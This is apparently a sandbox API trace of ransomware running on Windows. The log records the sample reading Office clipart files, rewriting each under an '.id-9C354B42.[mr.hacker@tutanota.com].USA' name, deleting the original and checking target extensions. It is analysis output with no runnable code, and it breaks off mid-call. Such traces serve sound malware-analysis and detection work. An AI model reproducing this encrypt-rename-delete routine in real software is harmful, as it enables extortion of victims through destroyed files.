lstrlenW (lpString=".dbf") returned 4 [0270.095] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.095] lstrlenW (lpString=".1cd") returned 4 [0270.095] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01186_.WMF") returned 63 [0270.095] lstrlenW (lpString=".jpg") returned 4 [0270.095] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.095] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.095] lstrlenW (lpString="DD01366_.WMF") returned 12 [0270.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.096] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=1768) returned 1 [0270.096] CloseHandle (hObject=0x384) returned 1 [0270.096] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf")) returned 0x20 [0270.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.097] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.097] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.097] GetLastError () returned 0x0 [0270.097] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x6e8, lpOverlapped=0x0) returned 1 [0270.099] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x6f0, lpOverlapped=0x0) returned 1 [0270.099] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.099] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.099] SetEndOfFile (hFile=0x328) returned 1 [0270.100] CloseHandle (hObject=0x328) returned 1 [0270.100] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.100] SetEndOfFile (hFile=0x384) returned 1 [0270.102] CloseHandle (hObject=0x384) returned 1 [0270.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.102] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01366_.wmf")) returned 1 [0270.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.102] lstrlenW (lpString=".doc") returned 4 [0270.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.102] lstrlenW (lpString=".docx") returned 5 [0270.102] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.102] lstrlenW (lpString=".pdf") returned 4 [0270.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.102] lstrlenW (lpString=".xls") returned 4 [0270.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.102] lstrlenW (lpString=".xlsx") returned 5 [0270.102] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.103] lstrlenW (lpString=".ppt") returned 4 [0270.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.103] lstrlenW (lpString=".zip") returned 4 [0270.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.103] lstrlenW (lpString=".rar") returned 4 [0270.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.103] lstrlenW (lpString=".bz2") returned 4 [0270.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.103] lstrlenW (lpString=".7z") returned 3 [0270.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.103] lstrlenW (lpString=".dbf") returned 4 [0270.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.103] lstrlenW (lpString=".1cd") returned 4 [0270.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.103] lstrlenW (lpString=".jpg") returned 4 [0270.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.103] lstrlenW (lpString=".doc") returned 4 [0270.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.103] lstrlenW (lpString=".docx") returned 5 [0270.103] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.104] lstrlenW (lpString=".pdf") returned 4 [0270.104] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.104] lstrlenW (lpString=".xls") returned 4 [0270.104] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.104] lstrlenW (lpString=".xlsx") returned 5 [0270.104] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.104] lstrlenW (lpString=".ppt") returned 4 [0270.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.104] lstrlenW (lpString=".zip") returned 4 [0270.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.104] lstrlenW (lpString=".rar") returned 4 [0270.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.104] lstrlenW (lpString=".bz2") returned 4 [0270.104] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.104] lstrlenW (lpString=".7z") returned 3 [0270.104] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.104] lstrlenW (lpString=".dbf") returned 4 [0270.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.104] lstrlenW (lpString=".1cd") returned 4 [0270.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01366_.WMF") returned 63 [0270.104] lstrlenW (lpString=".jpg") returned 4 [0270.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.105] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.105] lstrlenW (lpString="DD01434_.WMF") returned 12 [0270.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.106] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=900) returned 1 [0270.106] CloseHandle (hObject=0x384) returned 1 [0270.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf")) returned 0x20 [0270.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.106] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.107] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0270.107] GetLastError () returned 0x0 [0270.107] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x384, lpOverlapped=0x0) returned 1 [0270.109] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x390, lpOverlapped=0x0) returned 1 [0270.109] ReadFile (in: hFile=0x384, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.109] WriteFile (in: hFile=0x328, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.110] SetEndOfFile (hFile=0x328) returned 1 [0270.110] CloseHandle (hObject=0x328) returned 1 [0270.110] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.110] SetEndOfFile (hFile=0x384) returned 1 [0270.111] CloseHandle (hObject=0x384) returned 1 [0270.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.112] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01434_.wmf")) returned 1 [0270.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.149] lstrlenW (lpString=".doc") returned 4 [0270.149] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.149] lstrlenW (lpString=".docx") returned 5 [0270.149] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.149] lstrlenW (lpString=".pdf") returned 4 [0270.149] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.149] lstrlenW (lpString=".xls") returned 4 [0270.149] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.149] lstrlenW (lpString=".xlsx") returned 5 [0270.149] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.149] lstrlenW (lpString=".ppt") returned 4 [0270.150] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.150] lstrlenW (lpString=".zip") returned 4 [0270.150] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.150] lstrlenW (lpString=".rar") returned 4 [0270.150] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString=".bz2") returned 4 [0270.150] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString=".7z") returned 3 [0270.150] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.150] lstrlenW (lpString=".dbf") returned 4 [0270.150] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.150] lstrlenW (lpString=".1cd") returned 4 [0270.150] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.150] lstrlenW (lpString=".jpg") returned 4 [0270.150] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.150] lstrlenW (lpString=".doc") returned 4 [0270.150] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString=".docx") returned 5 [0270.150] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.150] lstrlenW (lpString=".pdf") returned 4 [0270.150] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.150] lstrlenW (lpString=".xls") returned 4 [0270.150] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.151] lstrlenW (lpString=".xlsx") returned 5 [0270.151] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.151] lstrlenW (lpString=".ppt") returned 4 [0270.151] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.151] lstrlenW (lpString=".zip") returned 4 [0270.151] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.151] lstrlenW (lpString=".rar") returned 4 [0270.151] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.151] lstrlenW (lpString=".bz2") returned 4 [0270.151] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.151] lstrlenW (lpString=".7z") returned 3 [0270.151] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.151] lstrlenW (lpString=".dbf") returned 4 [0270.151] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.151] lstrlenW (lpString=".1cd") returned 4 [0270.151] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01434_.WMF") returned 63 [0270.151] lstrlenW (lpString=".jpg") returned 4 [0270.151] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.151] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.151] lstrlenW (lpString="DD01586_.WMF") returned 12 [0270.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.167] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=2324) returned 1 [0270.167] CloseHandle (hObject=0x39c) returned 1 [0270.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf")) returned 0x20 [0270.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0270.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0270.167] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.167] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0270.290] GetLastError () returned 0x0 [0270.290] ReadFile (in: hFile=0x39c, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x914, lpOverlapped=0x0) returned 1 [0270.292] WriteFile (in: hFile=0x348, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x920, lpOverlapped=0x0) returned 1 [0270.293] ReadFile (in: hFile=0x39c, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0270.293] WriteFile (in: hFile=0x348, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.293] SetEndOfFile (hFile=0x348) returned 1 [0270.293] CloseHandle (hObject=0x348) returned 1 [0270.293] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0270.293] SetEndOfFile (hFile=0x39c) returned 1 [0270.295] CloseHandle (hObject=0x39c) returned 1 [0270.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0270.309] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf")) returned 1 [0270.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.310] lstrlenW (lpString=".doc") returned 4 [0270.310] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.310] lstrlenW (lpString=".docx") returned 5 [0270.310] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.310] lstrlenW (lpString=".pdf") returned 4 [0270.310] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.310] lstrlenW (lpString=".xls") returned 4 [0270.310] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.310] lstrlenW (lpString=".xlsx") returned 5 [0270.310] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.310] lstrlenW (lpString=".ppt") returned 4 [0270.310] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.310] lstrlenW (lpString=".zip") returned 4 [0270.310] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.310] lstrlenW (lpString=".rar") returned 4 [0270.310] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.310] lstrlenW (lpString=".bz2") returned 4 [0270.310] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.310] lstrlenW (lpString=".7z") returned 3 [0270.310] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.310] lstrlenW (lpString=".dbf") returned 4 [0270.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.310] lstrlenW (lpString=".1cd") returned 4 [0270.310] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.311] lstrlenW (lpString=".jpg") returned 4 [0270.311] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.311] lstrlenW (lpString=".doc") returned 4 [0270.311] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.311] lstrlenW (lpString=".docx") returned 5 [0270.311] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.311] lstrlenW (lpString=".pdf") returned 4 [0270.311] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.311] lstrlenW (lpString=".xls") returned 4 [0270.311] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.311] lstrlenW (lpString=".xlsx") returned 5 [0270.311] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.311] lstrlenW (lpString=".ppt") returned 4 [0270.311] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.311] lstrlenW (lpString=".zip") returned 4 [0270.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.311] lstrlenW (lpString=".rar") returned 4 [0270.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.311] lstrlenW (lpString=".bz2") returned 4 [0270.311] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.311] lstrlenW (lpString=".7z") returned 3 [0270.311] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.311] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.312] lstrlenW (lpString=".dbf") returned 4 [0270.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.312] lstrlenW (lpString=".1cd") returned 4 [0270.312] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.312] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0270.312] lstrlenW (lpString=".jpg") returned 4 [0270.312] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.312] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0270.312] lstrlenW (lpString="DD01630_.WMF") returned 12 [0270.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" 